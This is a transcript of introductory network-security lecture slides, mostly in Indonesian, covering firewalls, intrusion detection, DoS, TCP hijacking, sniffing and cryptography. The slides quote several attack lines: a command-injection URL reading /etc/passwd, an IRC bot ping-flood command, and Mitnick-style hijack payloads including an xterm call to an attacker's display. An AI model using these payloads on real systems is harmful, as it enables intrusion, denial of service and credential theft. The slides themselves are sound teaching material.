NETWORK SECURITY
description
Transcript of NETWORK SECURITY
+
NETWORK SECURITYIndra Priyandono
+A Brief History of the World
+Overview Apa itu security? Kenapa kita perlu security? Apa saja yang rentan? Serangan keamanan umum dan
penanggulangan Firewalls & Intrusion Detection Systems Denial of Service Attacks TCP Attacks Packet Sniffing Social Problems
+Apakah itu“Security”
Dictionary.com : 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;
confidence. 3. Something that gives or assures safety, as:
1. A group or department of private guards: Call building security if a visitor acts suspicious.
2. Measures adopted by a government to prevent espionage, sabotage, or attack.
3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.
…etc.
+Apakah itu“Security”
Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;
confidence. 3. Something that gives or assures safety,
as: 1. A group or department of private
guards: Call building security if a visitor acts suspicious.
2. Measures adopted by a government to prevent espionage, sabotage, or attack.
3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.
…etc.
+Apakah itu“Security”
Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;
confidence. 3. Something that gives or assures safety,
as: 1. A group or department of private
guards: Call building security if a visitor acts suspicious.
2. Measures adopted by a government to prevent espionage, sabotage, or attack.
3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.
…etc.
+Apakah itu“Security”
Dictionary.com says: 1. Freedom from risk or danger; safety. 2. Freedom from doubt, anxiety, or fear;
confidence. 3. Something that gives or assures safety, as:
1. A group or department of private guards: Call building security if a visitor acts suspicious.
2. Measures adopted by a government to prevent espionage, sabotage, or attack.
3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.
…etc.
+Kenapa Kita Perlu Security?
Melindungi informasi penting sementara masih memungkinkan akses ke mereka yang membutuhkannya Trade secrets, medical records, dll.
Menyediakan otentikasi dan kontrol akses untuk sumber daya Ex: AFS
Jaminan ketersediaan sumber daya Ex: 5 9’s (99.999% reliability)
+Apa saja yang Rentan?
Lembaga keuangan dan bank Penyedia layanan Internet Perusahaan farmasi Instansi pemerintah dan pertahanan Kontraktor ke berbagai instansi pemerintah Perusahaan multinasional ANYONE ON THE NETWORK!
+Serangan Keamanan Umum dan Penanggulangan
Menemukan jalan ke jaringan Firewalls
Pemanfaatan software bug, buffer overflows Intrusion Detection Systems
Denial of Service Ingress filtering, IDS
+Serangan Keamanan Umum dan Penanggulangan
TCP hijacking IPSec
Packet sniffing Encryption (SSH, SSL, HTTPS)
Social problems Education
+Firewalls
Masalah dasar - banyak aplikasi jaringan dan protokol memiliki masalah keamanan yang tetap dari waktu ke waktu Menjaga agar host selalu aman Solution
Administrator membatasi akses ke host dengan menggunakan firewall
Firewall tetap up-to-date oleh
+Firewalls
Firewall adalah seperti sebuah kastil dengan jembatan tarik Hanya satu titik akses ke jaringan Ini bisa baik atau buruk
Bisa hardware atau software Ex. beberapa routers dengen fungsi firewall ipfw, ipchains, pf pada Unix systems,
Windows XP dan Mac OS X mempunyai firewalls bult in
+Firewalls
Intranet
DMZInternet
Firewall
Firewall
Web server, email server, web proxy, etc
+Firewalls
Digunakan untuk paket filter didasarkan pada kombinasi dari fitur Ini disebut packet filtering firewall Ex. Drop paket dengan port tujuan 23
(Telnet) Dapat menggunakan kombinasi dari
IP/UDP/TCP header informasi manual ipfw pada unix utnuk lebih detail
+Firewalls Berikut adalah komputer default Windows XP
terlihat seperti: 135/tcp open loc-srv 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 3389/tcp open ms-term-serv 5000/tcp open UPnP
Mungkin perlu beberapa layanan tsb, atau kita tidak dapat mengontrol semua mesin pada jaringan
+Firewalls
Aturan firewall terlihat seperti apa? Tergantung pada firewall digunakan
Example: ipfw /sbin/ipfw add deny tcp from cracker.evil.org
to wolf.tambov.su telnet Contoh lain: WinXP & Mac OS X mempunyai
built in firewalls GUI yang berbeda Macam kompleksitasnya
+Intrusion Detection
Digunakan untuk memantau "aktivitas yang mencurigakan" pada jaringan Dapat melindungi terhadap eksploitasi
perangkat lunak yang diketahui, seperti buffer overflows
Open Source IDS: Snort, www.snort.org
+Intrusion Detection
Menggunakan “intrusion signatures” Mengenali patterns of behavior
Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.
Example IRIX vulnerability pada webdist.cgi
“/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”
Namun, IDS hanya berguna untuk mengetahui jika ada rencana kemungkinan serangan
+Minor Detour…
Say we got the /etc/passwd file from the IRIX server What can we do with it?
+Dictionary Attack
We can run a dictionary attack on the passwords The passwords in /etc/passwd are encrypted
with the crypt(3) function (one-way hash) Can take a dictionary of words, crypt() them
all, and compare with the hashed passwordsThis is why your passwords should be
meaningless random junk! For example, “sdfo839f” is a good password
That is not my andrew password Please don’t try it either
+Denial of Service
Tujuan: Membuat layanan jaringan tidak dapat digunakan, biasanya dengan melakukan overloading server atau jaringan
Berbagai jenis serangan DoS SYN flooding SMURF Distributed attacks
+Denial of ServiceNormal 3-way Handshake
SYN: PC Pengguna: “Hallo”
ACK-SYN: Server: “Anda ingin berkomunikasi?”
ACK: PC Pengguna “Ya”
DoS Handshake
SYN: PC Pengguna mengirim “hallo” berulang-ulang
ACK-SYN: Server merespons “Komunikasi?” berulang-ulang
No Response: PC Pengguna menunggu sampai server “timeout”
Pengguna Server
Pengguna Server
+Attacker Utama Attacker 1
Attacker 2
Attacker 3
Attacker 4
Attacker 5
Attacker 6
Attacker 7
Attacker 8 Server
Attacker utama melancarkan SYN floods dari beberapa tempat
+Denial of Service
+Denial of Service
Ping broadcast (smurf) Menggunakan IPspoofing (mengubah no IP dari
request) Respon dari ping dialamatkan ke komputer yang
IP-nya dispoof Akibatnya komputer tersbut akan banyak
menerima paket Terjadi pemborosan bandwidth Dapat mengakibatkan DoS Attack
+Denial of Service
Internet
Perpetrator V ictim
ICM P echo (spoofed source address o f vic tim )Sent to IP broadcast address
IC M P echo rep ly
+Denial of Service Distributed Denial of Service
Sama seperti teknik DoS biasa, tetapi pada skala yang jauh lebih besar
Example: Sub7Server Trojan dan IRC bots Menginfeksi sejumlah besar mesin dengan
program "zombie" Program Zombie log in ke IRC dan menunggu
perintahExample:
Perintah Bot: !p4 207.71.92.193 hasil: runs ping.exe 207.71.92.193 -l 65500 -n
10000 mengirim 10,000 64k packets ke host
(655MB!)
+Denial of Service
Mini Case Study – CodeRedJuly 19, 2001: over 359,000
computers infected with Code-Red in less than 14 hours
Used a recently known buffer exploit in Microsoft IIS
Damages estimated in excess of $2.6 billion
+Denial of Service
Why is this under the Denial of Service category?CodeRed launched a DDOS attack
against www1.whitehouse.gov from the 20th to the 28th of every month!
Spent the rest of its time infecting other hosts
+Denial of Service
How can we protect ourselves?Ingress filtering
If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it
RFC 2267 has more information about thisStay on top of CERT advisories and the
latest security patches A fix for the IIS buffer overflow was
released sixteen days before CodeRed had been deployed!
+TCP Attacks
Recall how IP works…End hosts create IP packets and
routers process them purely based on destination address alone
Problem: End hosts may lie about other fields which do not affect deliverySource address – host may trick
destination into believing that the packet is from a trusted source Especially applications which use IP
addresses as a simple authentication method
Solution – use better authentication methods
+TCP Attacks
TCP connections have associated stateStarting sequence numbers, port
numbers Problem – what if an attacker learns these values?
Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)
Sequence numbers are sometimes chosen in very predictable ways
+TCP Attacks
If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!
Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original sourceEx. Instead of downloading and
running new program, you download a virus and execute it
+TCP Attacks
Say hello to Alice, Bob and Mr. Big Ears
+TCP Attacks
Alice and Bob have an established TCP connection
+TCP Attacks
Mr. Big Ears lies on the path between Alice and Bob on the networkHe can intercept all of their packets
+TCP Attacks
First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?)
Packets
The Void
+TCP Attacks
Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)
ISN, SRC=Alice
+TCP Attacks
What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?Can just DoS Alice instead of dropping
her packetsCan just send guesses of what the ISN
is until it is accepted How do you know when the ISN is accepted?
Mitnick: payload is “add self to .rhosts”
Or, “xterm -display MrBigEars:0”
+TCP Attacks
Why are these types of TCP attacks so dangerous?
Web server
Malicious user
Trusting web client
+TCP Attacks
How do we prevent this? IPSec
Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
+Packet Sniffing
Ingat bagaimana Ethernet bekerja ... Ketika seseorang ingin mengirim paket ke tujuan... Mereka menempatkan bit pada kabel dengan tujuan
alamat MAC ... Dan ingat bahwa host lain mendengarkan pada kawat
untuk mendeteksi collisions ... Ini tidak bisa lebih mudah untuk mencari tahu data apa
yang sedang dikirim melalui jaringan!
+Packet Sniffing
Ini bekerja untuk wireless juga! Bahkan, ia bekerja untuk setiap media broadcast-based
+Packet Sniffing
Data jenis apa yang bisa kita dapatkan? Ditanyakan cara lain, apa jenis informasi akan
sangat berguna untuk pengguna berbahaya? Jawaban: Apa pun dalam teks biasa
(plaintext) Paling popular adalah Password
+Packet Sniffing Bagaimana kita bisa melindungi diri kita sendiri? SSH, bukan Telnet
Banyak orang menggunakan Telnet dan mengirim password mereka dengan jelas (menggunakan Putty sebagai gantinya!)
HTTP over SSL Terutama ketika melakukan pembelian dengan kartu kredit!
SFTP, bukan FTP Kecuali Anda benar-benar tidak peduli tentang password atau
data IPSec
Menyediakan kerahasiaan pada network-layer
+
Kriptografi
+Tujuan
Ada empat tujuan mendasar dari ilmu kriptografi ini yang juga merupakan aspek keamanan informasi yaitu : Kerahasiaan, adalah layanan yang digunakan untuk
menjaga isi dari informasi dari siapapun kecuali yang memiliki otoritas ataukunci rahasia untuk membuka/mengupas informasi yang telah disandi.
Integritas data, adalah berhubungan dengan penjagaan dari perubahan data secara tidak sah. Untuk menjaga integritas data, sistem harus memiliki kemampuan untuk mendeteksi manipulasi data oleh pihak-pihak yang tidak berhak, antara lain penyisipan, penghapusan, dan pensubsitusian data lain kedalam data yang sebenarnya.
+
Autentikasi, adalah berhubungan dengan identifikasi/pengenalan, baik secara kesatuan sistem maupun informasi itu sendiri. Dua pihak yang saling berkomunikasi harus saling memperkenalkan diri. Informasi yang dikirimkan melalui kanal harus diautentikasi keaslian, isi datanya, waktu pengiriman, dan lain-lain.
Non-repudiasi., atau nirpenyangkalan adalah usaha untuk mencegah terjadinya penyangkalan terhadap pengiriman/terciptanya suatu informasi oleh yang mengirimkan/membuat.
+Algoritma Sandi
Algoritma sandi adalah algoritma yang berfungsi untuk melakukan tujuan kriptografis
Algoritma tersebut harus memiliki kekuatan untuk melakukan (dikemukakan oleh Shannon): konfusi/pembingungan (confusion), dari teks
terang sehingga sulit untuk direkonstruksikan secara langsung tanpa menggunakan algoritma dekripsinya
difusi/peleburan (difusion), dari teks terang sehingga karakteristik dari teks terang tersebut hilang.
+
Secara umum berdasarkan kesamaan kuncinya, algoritma sandi dibedakan menjadi kunci-simetris/symetric-key, sering disebut
juga algoritma sandi konvensional karena umumnya diterapkan pada algoritma sandi klasik
kunci-asimetris/asymetric-key
+
Berdasarkan arah implementasi dan pembabakan jamannya dibedakan menjadi : algoritma sandi klasik classic cryptography algoritma sandi modern modern cryptography
+
Berdasarkan kerahasiaan kuncinya dibedakan menjadi : algoritma sandi kunci rahasia secret-key algoritma sandi kunci publik publik-key
+Algoritma sandi kunci-simetris Skema algoritma sandi akan disebut kunci-
simetris apabila untuk setiap proses enkripsi maupun dekripsi data secara keseluruhan digunakan kunci yang sama. Skema ini berdasarkan jumlah data per proses dan alur pengolahan data didalamnya dibedakan menjadi dua kelas, yaitu block-cipher dan stream-cipher.
+Block-Cipher
ECB, Electronic Code Book CBC, Cipher Block Chaining OFB, Output Feed Back CFB, Cipher Feed Back
+Stream-Cipher
Stream-cipher adalah algoritma sandi yang mengenkripsi data persatuan data, seperti bit, byte, nible atau per lima bit(saat data yang di enkripsi berupa data Boudout). Setiap mengenkripsi satu satuan data digunakan kunci yang merupakan hasil pembangkitan dari kunci sebelum.
+Algoritma-algoritma sandi kunci-simetrisBeberapa contoh algoritma yang menggunakan kunci-simetris: DES - Data Encryption Standard blowfish twofish MARS IDEA 3DES - DES diaplikasikan 3 kali AES - Advanced Encryption Standard, yang bernama
asli rijndael
+Fungsi Hash Kriptografis
Fungsi hash yang memiliki beberapa sifat keamanan tambahan sehingga dapat dipakai untuk tujuan keamanan data
Digunakan untuk keperluan autentikasi dan integritas data
Secara efisien mengubah string input dengan panjang berhingga menjadi string output dengan panjang tetap yang disebut nilai hash
+Sifat-Sifat Fungsi Hash Kriptografi Tahan preimej (Preimage resistant): bila
diketahui nilai hash h maka sulit (secara komputasi tidak layak) untuk mendapatkan m dimana h = hash(m).
Tahan preimej kedua (Second preimage resistant): bila diketahui input m1 maka sulit mencari input m2 (tidak sama dengan m1) yang menyebabkan hash(m1) = hash(m2).
Tahan tumbukan (Collision-resistant): sulit mencari dua input berbeda m1 dan m2 yang menyebabkan hash(m1) = hash(m2)
+Algoritma-Algoritma Fungsi Hash KriptografiBeberapa contoh algoritma fungsi hash Kriptografi: MD4 MD5 SHA-0 SHA-1 SHA-256 SHA-512